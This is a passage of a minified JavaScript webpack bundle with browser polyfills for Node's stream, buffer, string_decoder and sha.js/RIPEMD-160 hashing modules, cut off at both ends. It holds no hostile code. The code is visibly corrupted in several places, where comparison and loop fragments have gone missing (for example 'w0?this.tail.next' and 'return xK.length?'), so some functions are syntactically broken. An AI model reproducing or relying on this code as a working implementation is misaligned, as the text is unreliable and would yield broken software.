strict";function ie(D,w){var x=Object.keys(D);if(Object.getOwnPropertySymbols){var S=Object.getOwnPropertySymbols(D);w&&(S=S.filter(function(O){return Object.getOwnPropertyDescriptor(D,O).enumerable})),x.push.apply(x,S)}return x}function j(D){for(var w=1;w0?this.tail.next=S:this.head=S,this.tail=S,++this.length}},{key:"unshift",value:function(x){var S={data:x,next:this.head};0===this.length&&(this.tail=S),this.head=S,++this.length}},{key:"shift",value:function(){if(0!==this.length){var x=this.head.data;return this.head=1===this.length?this.tail=null:this.head.next,--this.length,x}}},{key:"clear",value:function(){this.head=this.tail=null,this.length=0}},{key:"join",value:function(x){if(0===this.length)return"";for(var S=this.head,O=""+S.data;S=S.next;)O+=x+S.data;return O}},{key:"concat",value:function(x){if(0===this.length)return b.alloc(0);for(var S=b.allocUnsafe(x>>>0),O=this.head,B=0;O;)p(O.data,S,B),B+=O.data.length,O=O.next;return S}},{key:"consume",value:function(x,S){var O;return xK.length?K.length:x;if(B+=ee===K.length?K:K.slice(0,x),0==(x-=ee)){ee===K.length?(++O,this.head=S.next?S.next:this.tail=null):(this.head=S,S.data=K.slice(ee));break}++O}return this.length-=O,B}},{key:"_getBuffer",value:function(x){var S=b.allocUnsafe(x),O=this.head,B=1;for(O.data.copy(S),x-=O.data.length;O=O.next;){var K=O.data,ee=x>K.length?K.length:x;if(K.copy(S,S.length-x,0,ee),0==(x-=ee)){ee===K.length?(++B,this.head=O.next?O.next:this.tail=null):(this.head=O,O.data=K.slice(ee));break}++B}return this.length-=B,S}},{key:A,value:function(x,S){return y(this,j(j({},S),{},{depth:0,customInspect:!1}))}}]),D}()},3475:(Pe,we,de)=>{"use strict";var ie=de(5486);function Q(E,C){$(E,C),ae(E)}function ae(E){E._writableState&&!E._writableState.emitClose||E._readableState&&!E._readableState.emitClose||E.emit("close")}function $(E,C){E.emit("error",C)}Pe.exports={destroy:function j(E,C){var b=this;return this._readableState&&this._readableState.destroyed||this._writableState&&this._writableState.destroyed?(C?C(E):E&&(this._writableState?this._writableState.errorEmitted||(this._writableState.errorEmitted=!0,ie.nextTick($,this,E)):ie.nextTick($,this,E)),this):(this._readableState&&(this._readableState.destroyed=!0),this._writableState&&(this._writableState.destroyed=!0),this._destroy(E||null,function(A){!C&&A?b._writableState?b._writableState.errorEmitted?ie.nextTick(ae,b):(b._writableState.errorEmitted=!0,ie.nextTick(Q,b,A)):ie.nextTick(Q,b,A):C?(ie.nextTick(ae,b),C(A)):ie.nextTick(ae,b)}),this)},undestroy:function I(){this._readableState&&(this._readableState.destroyed=!1,this._readableState.reading=!1,this._readableState.ended=!1,this._readableState.endEmitted=!1),this._writableState&&(this._writableState.destroyed=!1,this._writableState.ended=!1,this._writableState.ending=!1,this._writableState.finalCalled=!1,this._writableState.prefinished=!1,this._writableState.finished=!1,this._writableState.errorEmitted=!1)},errorOrDestroy:function U(E,C){var b=E._readableState,_=E._writableState;b&&b.autoDestroy||_&&_.autoDestroy?E.destroy(C):E.emit("error",C)}}},1341:(Pe,we,de)=>{"use strict";var ie=de(3749).q.ERR_STREAM_PREMATURE_CLOSE;function Q(){}Pe.exports=function I($,U,E){if("function"==typeof U)return I($,null,U);U||(U={}),E=function j($){var U=!1;return function(){if(!U){U=!0;for(var E=arguments.length,C=new Array(E),b=0;b{Pe.exports=function(){throw new Error("Readable.from is not available in the browser")}},6157:(Pe,we,de)=>{"use strict";var ie,Q=de(3749).q,ae=Q.ERR_MISSING_ARGS,I=Q.ERR_STREAM_DESTROYED;function $(A){if(A)throw A}function E(A,p,D,w){w=function j(A){var p=!1;return function(){p||(p=!0,A.apply(void 0,arguments))}}(w);var x=!1;A.on("close",function(){x=!0}),void 0===ie&&(ie=de(1341)),ie(A,{readable:p,writable:D},function(O){if(O)return w(O);x=!0,w()});var S=!1;return function(O){if(!x&&!S){if(S=!0,function U(A){return A.setHeader&&"function"==typeof A.abort}(A))return A.abort();if("function"==typeof A.destroy)return A.destroy();w(O||new I("pipe"))}}}function C(A){A()}function b(A,p){return A.pipe(p)}function _(A){return A.length&&"function"==typeof A[A.length-1]?A.pop():$}Pe.exports=function y(){for(var A=arguments.length,p=new Array(A),D=0;D0,function(se){x||(x=se),se&&S.forEach(C),!K&&(S.forEach(C),w(x))})});return p.reduce(b)}},7456:(Pe,we,de)=>{"use strict";var ie=de(3749).q.ERR_INVALID_OPT_VALUE;Pe.exports={getHighWaterMark:function Q(ae,I,$,U){var E=function j(ae,I,$){return null!=ae.highWaterMark?ae.highWaterMark:I?ae[$]:null}(I,U,$);if(null!=E){if(!isFinite(E)||Math.floor(E)!==E||E<0)throw new ie(U?$:"highWaterMark",E);return Math.floor(E)}return ae.objectMode?16:16384}}},7064:(Pe,we,de)=>{Pe.exports=de(8227).EventEmitter},4539:(Pe,we,de)=>{(we=Pe.exports=de(5455)).Stream=we,we.Readable=we,we.Writable=de(2481),we.Duplex=de(5157),we.Transform=de(3148),we.PassThrough=de(8743),we.finished=de(1341),we.pipeline=de(6157)},1447:(Pe,we,de)=>{"use strict";var ie=de(5449).Buffer,j=de(2270),Q=de(5110),ae=new Array(16),I=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,7,4,13,1,10,6,15,3,12,0,9,5,2,14,11,8,3,10,14,4,9,15,8,1,2,7,0,6,13,11,5,12,1,9,11,10,0,8,12,4,13,3,7,15,14,5,6,2,4,0,5,9,7,12,2,10,14,1,3,8,11,6,15,13],$=[5,14,7,0,9,2,11,4,13,6,15,8,1,10,3,12,6,11,3,7,0,13,5,10,14,15,8,12,4,9,1,2,15,5,1,3,7,14,6,9,11,8,12,2,10,0,4,13,8,6,4,1,3,11,15,0,5,12,2,13,9,7,10,14,12,15,10,4,1,5,8,7,6,2,13,14,0,3,9,11],U=[11,14,15,12,5,8,7,9,11,13,14,15,6,7,9,8,7,6,8,13,11,9,7,15,7,12,15,9,11,7,13,12,11,13,6,7,14,9,13,15,14,8,13,6,5,12,7,5,11,12,14,15,14,15,9,8,9,14,5,6,8,6,5,12,9,15,5,11,6,8,13,12,5,12,13,14,11,8,5,6],E=[8,9,9,11,13,15,15,5,7,7,8,11,14,14,12,6,9,13,15,7,12,8,9,11,7,7,12,7,6,15,13,11,9,7,15,11,8,6,6,14,12,13,5,14,13,13,7,5,15,5,8,11,14,14,6,14,6,9,12,9,12,5,15,8,8,5,12,9,12,5,14,6,8,13,6,5,15,13,11,11],C=[0,1518500249,1859775393,2400959708,2840853838],b=[1352829926,1548603684,1836072691,2053994217,0];function _(){Q.call(this,64),this._a=1732584193,this._b=4023233417,this._c=2562383102,this._d=271733878,this._e=3285377520}function y(S,O){return S<>>32-O}function A(S,O,B,K,ee,se,ve,le){return y(S+(O^B^K)+se+ve|0,le)+ee|0}function p(S,O,B,K,ee,se,ve,le){return y(S+(O&B|~O&K)+se+ve|0,le)+ee|0}function D(S,O,B,K,ee,se,ve,le){return y(S+((O|~B)^K)+se+ve|0,le)+ee|0}function w(S,O,B,K,ee,se,ve,le){return y(S+(O&K|B&~K)+se+ve|0,le)+ee|0}function x(S,O,B,K,ee,se,ve,le){return y(S+(O^(B|~K))+se+ve|0,le)+ee|0}j(_,Q),_.prototype._update=function(){for(var S=ae,O=0;O<16;++O)S[O]=this._block.readInt32LE(4*O);for(var B=0|this._a,K=0|this._b,ee=0|this._c,se=0|this._d,ve=0|this._e,le=0|this._a,ye=0|this._b,z=0|this._c,l=0|this._d,f=0|this._e,v=0;v<80;v+=1){var M,P;v<16?(M=A(B,K,ee,se,ve,S[I[v]],C[0],U[v]),P=x(le,ye,z,l,f,S[$[v]],b[0],E[v])):v<32?(M=p(B,K,ee,se,ve,S[I[v]],C[1],U[v]),P=w(le,ye,z,l,f,S[$[v]],b[1],E[v])):v<48?(M=D(B,K,ee,se,ve,S[I[v]],C[2],U[v]),P=D(le,ye,z,l,f,S[$[v]],b[2],E[v])):v<64?(M=w(B,K,ee,se,ve,S[I[v]],C[3],U[v]),P=p(le,ye,z,l,f,S[$[v]],b[3],E[v])):(M=x(B,K,ee,se,ve,S[I[v]],C[4],U[v]),P=A(le,ye,z,l,f,S[$[v]],b[4],E[v])),B=ve,ve=se,se=y(ee,10),ee=K,K=M,le=f,f=l,l=y(z,10),z=ye,ye=P}var G=this._b+ee+l|0;this._b=this._c+se+f|0,this._c=this._d+ve+le|0,this._d=this._e+B+ye|0,this._e=this._a+K+z|0,this._a=G},_.prototype._digest=function(){this._block[this._blockOffset++]=128,this._blockOffset>56&&(this._block.fill(0,this._blockOffset,64),this._update(),this._blockOffset=0),this._block.fill(0,this._blockOffset,56),this._block.writeUInt32LE(this._length[0],56),this._block.writeUInt32LE(this._length[1],60),this._update();var S=ie.alloc?ie.alloc(20):new ie(20);return S.writeInt32LE(this._a,0),S.writeInt32LE(this._b,4),S.writeInt32LE(this._c,8),S.writeInt32LE(this._d,12),S.writeInt32LE(this._e,16),S},Pe.exports=_},265:(Pe,we,de)=>{var ie=de(5449),j=ie.Buffer;function Q(I,$){for(var U in I)$[U]=I[U]}function ae(I,$,U){return j(I,$,U)}j.from&&j.alloc&&j.allocUnsafe&&j.allocUnsafeSlow?Pe.exports=ie:(Q(ie,we),we.Buffer=ae),ae.prototype=Object.create(j.prototype),Q(j,ae),ae.from=function(I,$,U){if("number"==typeof I)throw new TypeError("Argument must not be a number");return j(I,$,U)},ae.alloc=function(I,$,U){if("number"!=typeof I)throw new TypeError("Argument must be a number");var E=j(I);return void 0!==$?"string"==typeof U?E.fill($,U):E.fill($):E.fill(0),E},ae.allocUnsafe=function(I){if("number"!=typeof I)throw new TypeError("Argument must be a number");return j(I)},ae.allocUnsafeSlow=function(I){if("number"!=typeof I)throw new TypeError("Argument must be a number");return ie.SlowBuffer(I)}},9173:(Pe,we,de)=>{"use strict";var I,ie=de(5486),j=de(5449),Q=j.Buffer,ae={};for(I in j)!j.hasOwnProperty(I)||"SlowBuffer"===I||"Buffer"===I||(ae[I]=j[I]);var $=ae.Buffer={};for(I in Q)!Q.hasOwnProperty(I)||"allocUnsafe"===I||"allocUnsafeSlow"===I||($[I]=Q[I]);if(ae.Buffer.prototype=Q.prototype,(!$.from||$.from===Uint8Array.from)&&($.from=function(U,E,C){if("number"==typeof U)throw new TypeError('The "value" argument must not be of type number. Received type '+typeof U);if(U&&void 0===U.length)throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type "+typeof U);return Q(U,E,C)}),$.alloc||($.alloc=function(U,E,C){if("number"!=typeof U)throw new TypeError('The "size" argument must be of type number. Received type '+typeof U);if(U<0||U>=2*(1<<30))throw new RangeError('The value "'+U+'" is invalid for option "size"');var b=Q(U);return E&&0!==E.length?"string"==typeof C?b.fill(E,C):b.fill(E):b.fill(0),b}),!ae.kStringMaxLength)try{ae.kStringMaxLength=ie.binding("buffer").kStringMaxLength}catch(U){}ae.constants||(ae.constants={MAX_LENGTH:ae.kMaxLength},ae.kStringMaxLength&&(ae.constants.MAX_STRING_LENGTH=ae.kStringMaxLength)),Pe.exports=ae},7500:(Pe,we,de)=>{var ie=de(265).Buffer;function j(Q,ae){this._block=ie.alloc(Q),this._finalSize=ae,this._blockSize=Q,this._len=0}j.prototype.update=function(Q,ae){"string"==typeof Q&&(Q=ie.from(Q,ae=ae||"utf8"));for(var I=this._block,$=this._blockSize,U=Q.length,E=this._len,C=0;C=this._finalSize&&(this._update(this._block),this._block.fill(0));var I=8*this._len;if(I<=4294967295)this._block.writeUInt32BE(I,this._blockSize-4);else{var $=(4294967295&I)>>>0;this._block.writeUInt32BE((I-$)/4294967296,this._blockSize-8),this._block.writeUInt32BE($,this._blockSize-4)}this._update(this._block);var E=this._hash();return Q?E.toString(Q):E},j.prototype._update=function(){throw new Error("_update must be implemented by subclass")},Pe.exports=j},6890:(Pe,we,de)=>{var ie=Pe.exports=function(Q){Q=Q.toLowerCase();var ae=ie[Q];if(!ae)throw new Error(Q+" is not supported (we accept pull requests)");return new ae};ie.sha=de(3142),ie.sha1=de(2385),ie.sha224=de(3974),ie.sha256=de(5757),ie.sha384=de(9241),ie.sha512=de(3190)},3142:(Pe,we,de)=>{var ie=de(2270),j=de(7500),Q=de(265).Buffer,ae=[1518500249,1859775393,-1894007588,-899497514],I=new Array(80);function $(){this.init(),this._w=I,j.call(this,64,56)}function U(b){return b<<5|b>>>27}function E(b){return b<<30|b>>>2}function C(b,_,y,A){return 0===b?_&y|~_&A:2===b?_&y|_&A|y&A:_^y^A}ie($,j),$.prototype.init=function(){return this._a=1732584193,this._b=4023233417,this._c=2562383102,this._d=271733878,this._e=3285377520,this},$.prototype._update=function(b){for(var _=this._w,y=0|this._a,A=0|this._b,p=0|this._c,D=0|this._d,w=0|this._e,x=0;x<16;++x)_[x]=b.readInt32BE(4*x);for(;x<80;++x)_[x]=_[x-3]^_[x-8]^_[x-14]^_[x-16];for(var S=0;S<80;++S){var O=~~(S/20),B=U(y)+C(O,A,p,D)+w+_[S]+ae[O]|0;w=D,D=p,p=E(A),A=y,y=B}this._a=y+this._a|0,this._b=A+this._b|0,this._c=p+this._c|0,this._d=D+this._d|0,this._e=w+this._e|0},$.prototype._hash=function(){var b=Q.allocUnsafe(20);return b.writeInt32BE(0|this._a,0),b.writeInt32BE(0|this._b,4),b.writeInt32BE(0|this._c,8),b.writeInt32BE(0|this._d,12),b.writeInt32BE(0|this._e,16),b},Pe.exports=$},2385:(Pe,we,de)=>{var ie=de(2270),j=de(7500),Q=de(265).Buffer,ae=[1518500249,1859775393,-1894007588,-899497514],I=new Array(80);function $(){this.init(),this._w=I,j.call(this,64,56)}function U(_){return _<<1|_>>>31}function E(_){return _<<5|_>>>27}function C(_){return _<<30|_>>>2}function b(_,y,A,p){return 0===_?y&A|~y&p:2===_?y&A|y&p|A&p:y^A^p}ie($,j),$.prototype.init=function(){return this._a=1732584193,this._b=4023233417,this._c=2562383102,this._d=271733878,this._e=3285377520,this},$.prototype._update=function(_){for(var y=this._w,A=0|this._a,p=0|this._b,D=0|this._c,w=0|this._d,x=0|this._e,S=0;S<16;++S)y[S]=_.readInt32BE(4*S);for(;S<80;++S)y[S]=U(y[S-3]^y[S-8]^y[S-14]^y[S-16]);for(var O=0;O<80;++O){var B=~~(O/20),K=E(A)+b(B,p,D,w)+x+y[O]+ae[B]|0;x=w,w=D,D=C(p),p=A,A=K}this._a=A+this._a|0,this._b=p+this._b|0,this._c=D+this._c|0,this._d=w+this._d|0,this._e=x+this._e|0},$.prototype._hash=function(){var _=Q.allocUnsafe(20);return _.writeInt32BE(0|this._a,0),_.writeInt32BE(0|this._b,4),_.writeInt32BE(0|this._c,8),_.writeInt32BE(0|this._d,12),_.writeInt32BE(0|this._e,16),_},Pe.exports=$},3974:(Pe,we,de)=>{var ie=de(2270),j=de(5757),Q=de(7500),ae=de(265).Buffer,I=new Array(64);function $(){this.init(),this._w=I,Q.call(this,64,56)}ie($,j),$.prototype.init=function(){return this._a=3238371032,this._b=914150663,this._c=812702999,this._d=4144912697,this._e=4290775857,this._f=1750603025,this._g=1694076839,this._h=3204075428,this},$.prototype._hash=function(){var U=ae.allocUnsafe(28);return U.writeInt32BE(this._a,0),U.writeInt32BE(this._b,4),U.writeInt32BE(this._c,8),U.writeInt32BE(this._d,12),U.writeInt32BE(this._e,16),U.writeInt32BE(this._f,20),U.writeInt32BE(this._g,24),U},Pe.exports=$},5757:(Pe,we,de)=>{var ie=de(2270),j=de(7500),Q=de(265).Buffer,ae=[1116352408,1899447441,3049323471,3921009573,961987163,1508970993,2453635748,2870763221,3624381080,310598401,607225278,1426881987,1925078388,2162078206,2614888103,3248222580,3835390401,4022224774,264347078,604807628,770255983,1249150122,1555081692,1996064986,2554220882,2821834349,2952996808,3210313671,3336571891,3584528711,113926993,338241895,666307205,773529912,1294757372,1396182291,1695183700,1986661051,2177026350,2456956037,2730485921,2820302411,3259730800,3345764771,3516065817,3600352804,4094571909,275423344,430227734,506948616,659060556,883997877,958139571,1322822218,1537002063,1747873779,1955562222,2024104815,2227730452,2361852424,2428436474,2756734187,3204031479,3329325298],I=new Array(64);function $(){this.init(),this._w=I,j.call(this,64,56)}function U(A,p,D){return D^A&(p^D)}function E(A,p,D){return A&p|D&(A|p)}function C(A){return(A>>>2|A<<30)^(A>>>13|A<<19)^(A>>>22|A<<10)}function b(A){return(A>>>6|A<<26)^(A>>>11|A<<21)^(A>>>25|A<<7)}function _(A){return(A>>>7|A<<25)^(A>>>18|A<<14)^A>>>3}function y(A){return(A>>>17|A<<15)^(A>>>19|A<<13)^A>>>10}ie($,j),$.prototype.init=function(){return this._a=1779033703,this._b=3144134277,this._c=1013904242,this._d=2773480762,this._e=1359893119,this._f=2600822924,this._g=528734635,this._h=1541459225,this},$.prototype._update=function(A){for(var p=this._w,D=0|this._a,w=0|this._b,x=0|this._c,S=0|this._d,O=0|this._e,B=0|this._f,K=0|this._g,ee=0|this._h,se=0;se<16;++se)p[se]=A.readInt32BE(4*se);for(;se<64;++se)p[se]=y(p[se-2])+p[se-7]+_(p[se-15])+p[se-16]|0;for(var ve=0;ve<64;++ve){var le=ee+b(O)+U(O,B,K)+ae[ve]+p[ve]|0,ye=C(D)+E(D,w,x)|0;ee=K,K=B,B=O,O=S+le|0,S=x,x=w,w=D,D=le+ye|0}this._a=D+this._a|0,this._b=w+this._b|0,this._c=x+this._c|0,this._d=S+this._d|0,this._e=O+this._e|0,this._f=B+this._f|0,this._g=K+this._g|0,this._h=ee+this._h|0},$.prototype._hash=function(){var A=Q.allocUnsafe(32);return A.writeInt32BE(this._a,0),A.writeInt32BE(this._b,4),A.writeInt32BE(this._c,8),A.writeInt32BE(this._d,12),A.writeInt32BE(this._e,16),A.writeInt32BE(this._f,20),A.writeInt32BE(this._g,24),A.writeInt32BE(this._h,28),A},Pe.exports=$},9241:(Pe,we,de)=>{var ie=de(2270),j=de(3190),Q=de(7500),ae=de(265).Buffer,I=new Array(160);function $(){this.init(),this._w=I,Q.call(this,128,112)}ie($,j),$.prototype.init=function(){return this._ah=3418070365,this._bh=1654270250,this._ch=2438529370,this._dh=355462360,this._eh=1731405415,this._fh=2394180231,this._gh=3675008525,this._hh=1203062813,this._al=3238371032,this._bl=914150663,this._cl=812702999,this._dl=4144912697,this._el=4290775857,this._fl=1750603025,this._gl=1694076839,this._hl=3204075428,this},$.prototype._hash=function(){var U=ae.allocUnsafe(48);function E(C,b,_){U.writeInt32BE(C,_),U.writeInt32BE(b,_+4)}return E(this._ah,this._al,0),E(this._bh,this._bl,8),E(this._ch,this._cl,16),E(this._dh,this._dl,24),E(this._eh,this._el,32),E(this._fh,this._fl,40),U},Pe.exports=$},3190:(Pe,we,de)=>{var ie=de(2270),j=de(7500),Q=de(265).Buffer,ae=[1116352408,3609767458,1899447441,602891725,3049323471,3964484399,3921009573,2173295548,961987163,4081628472,1508970993,3053834265,2453635748,2937671579,2870763221,3664609560,3624381080,2734883394,310598401,1164996542,607225278,1323610764,1426881987,3590304994,1925078388,4068182383,2162078206,991336113,2614888103,633803317,3248222580,3479774868,3835390401,2666613458,4022224774,944711139,264347078,2341262773,604807628,2007800933,770255983,1495990901,1249150122,1856431235,1555081692,3175218132,1996064986,2198950837,2554220882,3999719339,2821834349,766784016,2952996808,2566594879,3210313671,3203337956,3336571891,1034457026,3584528711,2466948901,113926993,3758326383,338241895,168717936,666307205,1188179964,773529912,1546045734,1294757372,1522805485,1396182291,2643833823,1695183700,2343527390,1986661051,1014477480,2177026350,1206759142,2456956037,344077627,2730485921,1290863460,2820302411,3158454273,3259730800,3505952657,3345764771,106217008,3516065817,3606008344,3600352804,1432725776,4094571909,1467031594,275423344,851169720,430227734,3100823752,506948616,1363258195,659060556,3750685593,883997877,3785050280,958139571,3318307427,1322822218,3812723403,1537002063,2003034995,1747873779,3602036899,1955562222,1575990012,2024104815,1125592928,2227730452,2716904306,2361852424,442776044,2428436474,593698344,2756734187,3733110249,3204031479,2999351573,3329325298,3815920427,3391569614,3928383900,3515267271,566280711,3940187606,3454069534,4118630271,4000239992,116418474,1914138554,174292421,2731055270,289380356,3203993006,460393269,320620315,685471733,587496836,852142971,1086792851,1017036298,365543100,1126000580,2618297676,1288033470,3409855158,1501505948,4234509866,1607167915,987167468,1816402316,1246189591],I=new Array(160);function $(){this.init(),this._w=I,j.call(this,128,112)}function U(w,x,S){return S^w&(x^S)}function E(w,x,S){return w&x|S&(w|x)}function C(w,x){return(w>>>28|x<<4)^(x>>>2|w<<30)^(x>>>7|w<<25)}function b(w,x){return(w>>>14|x<<18)^(w>>>18|x<<14)^(x>>>9|w<<23)}function _(w,x){return(w>>>1|x<<31)^(w>>>8|x<<24)^w>>>7}function y(w,x){return(w>>>1|x<<31)^(w>>>8|x<<24)^(w>>>7|x<<25)}function A(w,x){return(w>>>19|x<<13)^(x>>>29|w<<3)^w>>>6}function p(w,x){return(w>>>19|x<<13)^(x>>>29|w<<3)^(w>>>6|x<<26)}function D(w,x){return w>>>0>>0?1:0}ie($,j),$.prototype.init=function(){return this._ah=1779033703,this._bh=3144134277,this._ch=1013904242,this._dh=2773480762,this._eh=1359893119,this._fh=2600822924,this._gh=528734635,this._hh=1541459225,this._al=4089235720,this._bl=2227873595,this._cl=4271175723,this._dl=1595750129,this._el=2917565137,this._fl=725511199,this._gl=4215389547,this._hl=327033209,this},$.prototype._update=function(w){for(var x=this._w,S=0|this._ah,O=0|this._bh,B=0|this._ch,K=0|this._dh,ee=0|this._eh,se=0|this._fh,ve=0|this._gh,le=0|this._hh,ye=0|this._al,z=0|this._bl,l=0|this._cl,f=0|this._dl,v=0|this._el,M=0|this._fl,P=0|this._gl,G=0|this._hl,X=0;X<32;X+=2)x[X]=w.readInt32BE(4*X),x[X+1]=w.readInt32BE(4*X+4);for(;X<160;X+=2){var L=x[X-30],h=x[X-30+1],R=_(L,h),J=y(h,L),Z=A(L=x[X-4],h=x[X-4+1]),ue=p(h,L),Ue=x[X-32],Xe=x[X-32+1],He=J+x[X-14+1]|0,Be=R+x[X-14]+D(He,J)|0;Be=(Be=Be+Z+D(He=He+ue|0,ue)|0)+Ue+D(He=He+Xe|0,Xe)|0,x[X]=Be,x[X+1]=He}for(var qe=0;qe<160;qe+=2){Be=x[qe],He=x[qe+1];var De=E(S,O,B),Ve=E(ye,z,l),ze=C(S,ye),me=C(ye,S),Ke=b(ee,v),rt=b(v,ee),Ge=ae[qe],Qe=ae[qe+1],ht=U(ee,se,ve),mt=U(v,M,P),lt=G+rt|0,ft=le+Ke+D(lt,G)|0;ft=(ft=(ft=ft+ht+D(lt=lt+mt|0,mt)|0)+Ge+D(lt=lt+Qe|0,Qe)|0)+Be+D(lt=lt+He|0,He)|0;var xe=me+Ve|0,We=ze+De+D(xe,me)|0;le=ve,G=P,ve=se,P=M,se=ee,M=v,ee=K+ft+D(v=f+lt|0,f)|0,K=B,f=l,B=O,l=z,O=S,z=ye,S=ft+We+D(ye=lt+xe|0,lt)|0}this._al=this._al+ye|0,this._bl=this._bl+z|0,this._cl=this._cl+l|0,this._dl=this._dl+f|0,this._el=this._el+v|0,this._fl=this._fl+M|0,this._gl=this._gl+P|0,this._hl=this._hl+G|0,this._ah=this._ah+S+D(this._al,ye)|0,this._bh=this._bh+O+D(this._bl,z)|0,this._ch=this._ch+B+D(this._cl,l)|0,this._dh=this._dh+K+D(this._dl,f)|0,this._eh=this._eh+ee+D(this._el,v)|0,this._fh=this._fh+se+D(this._fl,M)|0,this._gh=this._gh+ve+D(this._gl,P)|0,this._hh=this._hh+le+D(this._hl,G)|0},$.prototype._hash=function(){var w=Q.allocUnsafe(64);function x(S,O,B){w.writeInt32BE(S,B),w.writeInt32BE(O,B+4)}return x(this._ah,this._al,0),x(this._bh,this._bl,8),x(this._ch,this._cl,16),x(this._dh,this._dl,24),x(this._eh,this._el,32),x(this._fh,this._fl,40),x(this._gh,this._gl,48),x(this._hh,this._hl,56),w},Pe.exports=$},7856:(Pe,we,de)=>{"use strict";var ie=de(5449).Buffer;const j=Symbol.prototype.valueOf,Q=de(7374);Pe.exports=function ae(b,_){switch(Q(b)){case"array":return b.slice();case"object":return Object.assign({},b);case"date":return new b.constructor(Number(b));case"map":return new Map(b);case"set":return new Set(b);case"buffer":return function E(b){const _=b.length,y=ie.allocUnsafe?ie.allocUnsafe(_):ie.from(_);return b.copy(y),y}(b);case"symbol":return function C(b){return j?Object(j.call(b)):{}}(b);case"arraybuffer":return function $(b){const _=new b.constructor(b.byteLength);return new Uint8Array(_).set(new Uint8Array(b)),_}(b);case"float32array":case"float64array":case"int16array":case"int32array":case"int8array":case"uint16array":case"uint32array":case"uint8clampedarray":case"uint8array":return function U(b,_){return new b.constructor(b.buffer,b.byteOffset,b.length)}(b);case"regexp":return function I(b){const _=void 0!==b.flags?b.flags:/\w+$/.exec(b)||void 0,y=new b.constructor(b.source,_);return y.lastIndex=b.lastIndex,y}(b);case"error":return Object.create(b);default:return b}}},4893:(Pe,we,de)=>{Pe.exports=Q;var ie=de(8227).EventEmitter;function Q(){ie.call(this)}de(2270)(Q,ie),Q.Readable=de(5455),Q.Writable=de(2481),Q.Duplex=de(5157),Q.Transform=de(3148),Q.PassThrough=de(8743),Q.finished=de(1341),Q.pipeline=de(6157),Q.Stream=Q,Q.prototype.pipe=function(ae,I){var $=this;function U(p){ae.writable&&!1===ae.write(p)&&$.pause&&$.pause()}function E(){$.readable&&$.resume&&$.resume()}$.on("data",U),ae.on("drain",E),!ae._isStdio&&(!I||!1!==I.end)&&($.on("end",b),$.on("close",_));var C=!1;function b(){C||(C=!0,ae.end())}function _(){C||(C=!0,"function"==typeof ae.destroy&&ae.destroy())}function y(p){if(A(),0===ie.listenerCount(this,"error"))throw p}function A(){$.removeListener("data",U),ae.removeListener("drain",E),$.removeListener("end",b),$.removeListener("close",_),$.removeListener("error",y),ae.removeListener("error",y),$.removeListener("end",A),$.removeListener("close",A),ae.removeListener("close",A)}return $.on("error",y),ae.on("error",y),$.on("end",A),$.on("close",A),ae.on("close",A),ae.emit("pipe",$),ae}},5741:(Pe,we,de)=>{"use strict";var ie=de(265).Buffer,j=ie.isEncoding||function(S){switch((S=""+S)&&S.toLowerCase()){case"hex":case"utf8":case"utf-8":case"ascii":case"binary":case"base64":case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":case"raw":return!0;default:return!1}};function I(S){var O;switch(this.encoding=function ae(S){var O=function Q(S){if(!S)return"utf8";for(var O;;)switch(S){case"utf8":case"utf-8":return"utf8";case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return"utf16le";case"latin1":case"binary":return"latin1";case"base64":case"ascii":case"hex":return S;default:if(O)return;S=(""+S).toLowerCase(),O=!0}}(S);if("string"!=typeof O&&(ie.isEncoding===j||!j(S)))throw new Error("Unknown encoding: "+S);return O||S}(S),this.encoding){case"utf16le":this.text=y,this.end=A,O=4;break;case"utf8":this.fillLast=C,O=4;break;case"base64":this.text=p,this.end=D,O=3;break;default:return this.write=w,void(this.end=x)}this.lastNeed=0,this.lastTotal=0,this.lastChar=ie.allocUnsafe(O)}function $(S){return S<=127?0:S>>5==6?2:S>>4==14?3:S>>3==30?4:S>>6==2?-1:-2}function C(S){var O=this.lastTotal-this.lastNeed,B=function E(S,O,B){if(128!=(192&O[0]))return S.lastNeed=0,"\ufffd";if(S.lastNeed>1&&O.length>1){if(128!=(192&O[1]))return S.lastNeed=1,"\ufffd";if(S.lastNeed>2&&O.length>2&&128!=(192&O[2]))return S.lastNeed=2,"\ufffd"}}(this,S);return void 0!==B?B:this.lastNeed<=S.length?(S.copy(this.lastChar,O,0,this.lastNeed),this.lastChar.toString(this.encoding,0,this.lastTotal)):(S.copy(this.lastChar,O,0,S.length),void(this.lastNeed-=S.length))}function y(S,O){if((S.length-O)%2==0){var B=S.toString("utf16le",O);if(B){var K=B.charCodeAt(B.length-1);if(K>=55296&&K<=56319)return this.lastNeed=2,this.lastTotal=4,this.lastChar[0]=S[S.length-2],this.lastChar[1]=S[S.length-1],B.slice(0,-1)}return B}return this.lastNeed=1,this.lastTotal=2,this.lastChar[0]=S[S.length-1],S.toString("utf16le",O,S.length-1)}function A(S){var O=S&&S.length?this.write(S):"";return this.lastNeed?O+this.lastChar.toString("utf16le",0,this.lastTotal-this.lastNeed):O}function p(S,O){var B=(S.length-O)%3;return 0===B?S.toString("base64",O):(this.lastNeed=3-B,this.lastTotal=3,1===B?this.lastChar[0]=S[S.length-1]:(this.lastChar[0]=S[S.length-2],this.lastChar[1]=S[S.length-1]),S.toString("base64",O,S.length-B))}function D(S){var O=S&&S.length?this.write(S):"";return this.lastNeed?O+this.lastChar.toString("base64",0,3-this.lastNeed):O}function w(S){return S.toString(this.encoding)}function x(S){return S&&S.length?this.write(S):""}we.s=I,I.prototype.write=function(S){if(0===S.length)return"";var O,B;if(this.lastNeed){if(void 0===(O=this.fillLast(S)))return"";B=this.lastNeed,this.lastNeed=0}else B=0;return B=0?(ee>0&&(S.lastNeed=ee-1),ee):--K=0?(ee>0&&(S.lastNeed=ee-2),ee):--K=0?(ee>0&&(2===ee?ee=0:S.lastNeed=ee-3),ee):0}(this,S,O);if(!this.lastNeed)return S.toString("utf8",O);this.lastTotal=B;var K=S.length-(B-this.lastNeed);return S.copy(this.lastChar,0,K),S.toString("utf8",O,K)},I.prototype.fillLast=function(S){if(this.lastNeed<=S.length)return S.copy(this.lastChar,this.lastTotal-this.lastNeed,0,this.lastNeed),this.lastChar.toString(this.encoding,0,this.lastTotal);S.copy(this.lastChar,this.lastTotal-this.lastNeed,0,S.length),this.lastNeed-=S.length}},7226:Pe=>{function de(ie){try{if(!global.localStorage)return!1}catch(Q){return!1}var j=global.localStorage[ie];return null!=j&&"true"===String(j).toLowerCase()}Pe.exports=function 